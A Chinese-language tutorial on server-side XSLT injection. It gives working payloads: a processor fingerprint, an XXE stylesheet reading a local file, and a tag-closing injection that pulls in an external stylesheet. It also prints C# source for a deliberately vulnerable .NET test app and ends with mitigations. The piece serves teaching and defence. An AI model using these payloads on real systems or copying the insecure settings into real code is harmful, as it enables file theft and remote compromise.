解析XSLT服务器端注入攻击

写在前面的话

可扩展样式表转换语言(XSLT)漏洞可以给受影响的应用程序带来严重的安全隐患,一般来说,这种漏洞将允许攻击者在目标设备上实现远程代码执行。目前已公开的XSLT远程代码执行漏洞可利用样本有CVE-2012-5357(影响.Net Ektron CMS)、CVE-2012-1592(影响Apache Struts 2.0)和CVE-2005-3757(影响Google搜索工具)。

从上面这几个漏洞样本中我们可以看到,XSLT漏洞已经存在已久了,虽然它不像XML注入、SQL注入或XSS漏洞一样常见,但是我们经常能够在安全审计的过程中发现这种漏洞。不过,目前还没有多少人真正了解针对这种漏洞的利用技术。

在这篇文章中,我们将跟大家分享一些针对XSLT的攻击案例,并让大家了解到这项技术的安全缺陷。简而言之,这种类型的漏洞将允许攻击者实现远程代码执行、从远程系统中窃取数据、执行网络扫描、访问目标用户内部网络资源等恶意活动。

除此之外,我们还提供了一个包含了相关XSLT漏洞的简单应用,并在文章结尾给出了针对此漏洞的缓解方案。

[[212393]]

XSLT是什么?

XSL(可扩展样式表语言)是一种用于转换XML文档的语言,XSLT表示的就是XSL转换,而XSL转换指的就是XML文档本身。转换后得到的一般都是不同的XML文档或其他类型文档,例如HTML文档、CSV文件以及明文文本文件等等。

一般来说,应用程序或模板引擎在处理不同文件类型时需要使用XSLT来进行数据转换。很多企业级应用比较喜欢使用XSLT,比如说,多用户发票应用程序可以使用XSLT来允许客户自定义它们的发票,客户可以根据自己的需求来修改发票信息以及格式。

其他常见应用:

  • 报告功能
  • 多种格式的数据导出功能;
  • 数据打印和输出功能;
  • 电子邮件;

在介绍攻击技术之前,我们先来看一看数据转换的实例。下面这个XML文件包含有多个水果名称(fruits)以及相关描述:

  1. <?xml version="1.0" ?> 
  2. <fruits> 
  3.   <fruit> 
  4.     <name>Lemon</name> 
  5.     <description>Yellow and sour</description> 
  6.   </fruit> 
  7.   <fruit> 
  8.     <name>Watermelon</name> 
  9.     <description>Round, green outside, red inside</description> 
  10.   </fruit> 
  11. </fruits> 

 

 

接下来,我们可以使用下面这种XSL转换技术来将XML文档转换为明文文本文件:

  1. <?xml version="1.0" encoding="utf-8"?> 
  2. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 
  3.   <xsl:template match="/fruits"> 
  4.     Fruits: 
  5.     <!-- Loop for each fruit --> 
  6.     <xsl:for-each select="fruit"> 
  7.       <!-- Print name: description --> 
  8.       - <xsl:value-of select="name"/><xsl:value-of select="description"/> 
  9.     </xsl:for-each> 
  10.   </xsl:template> 
  11. </xsl:stylesheet> 

 

 

 

转换之后的明文文本文件内容如下:

  1. Fruits: 
  2.   
  3.       - Lemon: Yellow and sour 
  4.       - Watermelon: Round, green outside, red inside 

利用XSLT服务器端注入漏洞

在这一部分,我们将跟大家介绍如何发现并利用应用程序中的XSLT漏洞。下面的样本使用了微软的System.Xml XSLT实现,不过类似的技术也应用到了很多类似Libxslt、Saxon和Xalan等常见代码库上。

寻找漏洞切入点

首先我们需要识别出应用程序包含漏洞的部分,一般来说这种漏洞会存在于应用程序允许上传任意XSLT文件的地方。除此之外,如果应用程序存在这种漏洞的话,它很可能会使用不受信任的用户输入来动态生成XSL转换后的XML文档。

比如说,应用程序可以生成下列XSLT文档,而字符串“Your Company Name Here”来自于不受信任的用户输入。

  1. <?xml version=”1.0” encoding=”utf-8”?> 
  2. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 
  3.   <xsl:template match="/fruits"> 
  4.     Your Company Name Here 
  5.     Fruits: 
  6.     <!-- Loop for each fruit --> 
  7.     <xsl:for-each select="fruit"> 
  8.       <!-- Print name: description --> 
  9.       - <xsl:value-of select="name"/><xsl:value-of select="description"/> 
  10.     </xsl:for-each> 
  11.   </xsl:template> 
  12.   <xsl:include href="external_transform.xslt"/> 
  13. </xsl:stylesheet> 

 

 

 

为了确认应用程序是否存在这个漏洞,我们可以向其注入一些类似双引号、单引号以及破折号等特殊字符,因为这类字符可以让XML文档中的语句失效。如果服务器返回了错误,那么这个应用就很有可能存在漏洞。需要注意的是,这种方法同样适用于XML注入漏洞。

为了方便演示,我们假设下面给出的样本允许我们提交任意XSLT文档。

system-property()函数

不同的代码库所实现的XSLT功能也不同,代码库A实现了的功能代码库B不一定会实现,而且就算实现的是相同的功能,不同代码库的实现方式也不同。一般来说,旧版本的代码库默认会开启很多危险的功能,而新版本代码库的很多功能往往需要开发人员去手动开启。

我们可以使用system-property()函数来查看代码库的开发者名称,该功能符合XSLT v1.0标准,所有的代码库都实现了这种功能。

有效参数:

  1. xsl:vendor 
  2. xsl:vendor-url 
  3. xsl:version 

下列转换可以用来确定代码库的开发者(vendor):

  1. <?xml version="1.0" encoding="utf-8"?> 
  2. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 
  3.   <xsl:template match="/fruits"> 
  4.                                                                                                   <xsl:value-of select="system-property('xsl:vendor')"/> 
  5.   </xsl:template> 
  6. </xsl:stylesheet> 

 

 

由于我们的测试目标使用的是Microsoft .Net System.xml实现,因此返回的结果为“Microsoft”:

  1. Microsoft 

XXE与数据提取

除了常见的XML攻击之外,XXE攻击同样可以影响XSLT。在下面的样本中,我们使用一个外部实体读取出了“C:\secretfruit.txt”文件的内容:

  1. <?xml version="1.0" encoding="utf-8"?> 
  2. <!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]> 
  3. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 
  4.   <xsl:template match="/fruits"> 
  5.     Fruits &ext_file;: 
  6.     <!-- Loop for each fruit --> 
  7.     <xsl:for-each select="fruit"> 
  8.       <!-- Print name: description --> 
  9.       - <xsl:value-of select="name"/><xsl:value-of select="description"/> 
  10.     </xsl:for-each> 
  11.   </xsl:template> 
  12.   
  13. </xsl:stylesheet> 

 

 

 

ENTITY元素将文件内容存储在了“ext_file”引用中,随后我们可以用“&ext_file;”语句将内容存储在了主文档中。输出数据则包含了文件中的秘密内容(“Golden Apple”):

  1. Fruits Golden Apple: 
  2.   
  3.       - Lemon: Yellow and sour 
  4.       - Watermelon: Round, green outside, red inside 

这项技术可以用来远程获取存储在本地Web服务器中的文件内容,这些文件可以是包含了凭证数据的配置文件或者是包含了敏感信息的文件等等。除此之外,攻击者还可以通过UNC (\\servername\share\file)路径或者URL (http://servername/file)来获取目标内部网络系统中托管的文件。

Import和Include

import和include标签可以用来合并多个XSLT文档,如果我们只能在XSLT文档中间注入内容的话,我们也许就不能直接使用XML外部实体(XXE)攻击或脚本来进行攻击了,因为这些攻击技术要求我们在文档头部实现内容注入。

我们还是使用之前那个XSLT文档来进行演示:

  1. <?xml version=”1.0” encoding=”utf-8"?> 
  2. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 
  3.   <xsl:template match="/fruits"> 
  4.     Your Company Name Here 
  5.     Fruits: 
  6.                                                                                                                           <!-- Loop for each fruit --> 
  7.     <xsl:for-each select="fruit"> 
  8.       <!-- Print name: description --> 
  9.       - <xsl:value-of select="name"/><xsl:value-of select="description"/> 
  10.     </xsl:for-each> 
  11.   </xsl:template> 
  12.   <xsl:include href="external_transform.xslt"/> 
  13. </xsl:stylesheet> 

 

 

 

我们需要include下面这个名为“external_transform.xslt”的外部XSLT文件:

  1. <?xml version=”1.0” encoding=”utf-8”?> 
  2. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 
  3.     <xsl:template match="/"> 
  4.                                                                                                                        Hello from the external transformation 
  5.     </xsl:template> 
  6. </xsl:stylesheet> 

 

 

为了include外部文档,我们需要注入下列标签:

  1. <xsl:include href="external_transform.xslt"/> 

但是这里有一个问题,即“xsl:include”标签无法包含在一个“xsl:template”标签中,而且生成的文件必须是XML文档。

因此,我们首先需要闭合“xsl:template”标签,然后添加“xsl:include”标签,最终的Payload如下:

  1. </xsl:template><xsl:include href="external_transform.xslt"/><xsl:template name="a"> 

注入完成之后,生成的XSLT文档如下:

  1. <?xml version="1.0" encoding="utf-8"?> 
  2. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 
  3.   <xsl:template match="/fruits"> 
  4.     </xsl:template><xsl:include href="external_transform.xslt"/><xsl:template name="a"> 
  5.     Fruits: 
  6.     <!-- Loop for each fruit --> 
  7.     <xsl:for-each select="fruit"> 
  8.       <!-- Print name: description --> 
  9.       - <xsl:value-of select="name"/><xsl:value-of select="description"/> 
  10.     </xsl:for-each> 
  11.   </xsl:template> 
  12.   <xsl:include href="external_transform.xslt"/> 
  13. </xsl:stylesheet> 

 

 

 

转换结果如下:

  1. Hello from the external transformation 

注:在XXE和document()函数的帮助下,“include”和“import”标签同样可以用来进行提取数据以及端口扫描等操作。

可用于测试XSLT漏洞的App

为了给大家提供一种快速测试Payload的方法,我们专门开发了一款包含XSLT漏洞的小型.Net应用,这款应用使用了.Net的System.Xml实现。

下面给出的是应用的源代码,你可以使用Microsoft Visual Studio对其进行编译。应用程序的源代码以及编译版本可点击【这里】获取。源代码如下:

  1. using System; 
  2. using System.Xml; 
  3. using System.Xml.Xsl; 
  4.   
  5. namespace XsltConsoleApplication 
  6.     class Program 
  7.     { 
  8.         /* 
  9.         This code contains serious vulnerabilities and is provided for training purposes only! 
  10.         DO NOT USE ANYWHERE FOR ANYTHING ELSE!!! 
  11.         */ 
  12.         static void Main(string[] args) 
  13.         { 
  14.             Console.WriteLine("\n#####################################################################"); 
  15.             Console.WriteLine("#                                                                   #"); 
  16.             Console.WriteLine("# This is a Vulnerable-by-Design application to test XSLT Injection #"); 
  17.             Console.WriteLine("#                                                                   #"); 
  18.             Console.WriteLine("#####################################################################\n"); 
  19.             Console.WriteLine("The application expects (in the current working directory):"); 
  20.             Console.WriteLine(" - an XML file (data.xml) and\n - an XSLT style sheet (transform.xslt)\n"); 
  21.             Console.WriteLine("==================================================================="); 
  22.   
  23.             String transformationXsltFileURI = "transform.xslt"
  24.             String dataXMLFileURI = "data.xml"
  25.   
  26.             // Enable DTD processing to load external XML entities for both the XML and XSLT file 
  27.             XmlReaderSettings vulnerableXmlReaderSettings = new XmlReaderSettings(); 
  28.             vulnerableXmlReaderSettings.DtdProcessing = DtdProcessing.Parse; 
  29.             vulnerableXmlReaderSettings.XmlResolver = new XmlUrlResolver(); 
  30.             XmlReader vulnerableXsltReader = XmlReader.Create(transformationXsltFileURI, vulnerableXmlReaderSettings); 
  31.             XmlReader vulnerableXmlReader = XmlReader.Create(dataXMLFileURI, vulnerableXmlReaderSettings); 
  32.   
  33.             XsltSettings vulnerableSettings = new XsltSettings(); 
  34.             // Embedded script blocks and the document() function are NOT enabled by default 
  35.             vulnerableSettings.EnableDocumentFunction = true
  36.             vulnerableSettings.EnableScript = true
  37.             // A vulnerable settings class can also be created with: 
  38.             // vulnerableSettings = XsltSettings.TrustedXslt; 
  39.   
  40.             XslCompiledTransform vulnerableTransformation = new XslCompiledTransform(); 
  41.             // XmlUrlResolver is the default resolver for XML and XSLT and supports the file: and http: protocols 
  42.             XmlUrlResolver vulnerableResolver = new XmlUrlResolver(); 
  43.             vulnerableTransformation.Load(vulnerableXsltReader, vulnerableSettings, vulnerableResolver);   
  44.   
  45.             XmlWriter output = new XmlTextWriter(Console.Out); 
  46.   
  47.             // Run the transformation 
  48.             vulnerableTransformation.Transform(vulnerableXmlReader, output);    
  49.   
  50.         } 
  51.     } 

注:该应用要求当前工作目录中存储data.xml和transformation.xslt文件。

缓解方案

如果你的应用程序使用了XSLT,那我建议你可以考虑以下缓解方案:

  1. 尽可能避免用户提供的XSLT文档;
  2. 不要使用不受信任的输入来生成XSLT文档,例如拼接的字符串。如果你需要使用非静态值,你可以选择从XML数据文件或者XSLT文档中获取。
  3. 禁用XSLT代码库实现的所有危险功能,因为代码库的默认配置通常都是不安全的。确保禁用嵌入式脚本扩展,以及其他允许读写外部文件的专用扩展。

如果你想了解更多关于热门XSLT代码库的功能以及相应的默认配置,可以参考Emanuel Duss 和Roland Bischofberger发布的文档【参考文献】。

总结

对于很多应用程序来说,XSLT虽然是一种功能强大的工具,但它也有很多不为人知的弱点。不良的编码习惯将有可能让应用程序出现安全漏洞,而这些漏洞将有可能允许攻击者远程控制你的应用程序并从中提取数据。

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/128502.html<

(0)
运维的头像运维
上一篇2025-02-25 04:28
下一篇 2025-02-25 04:29

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注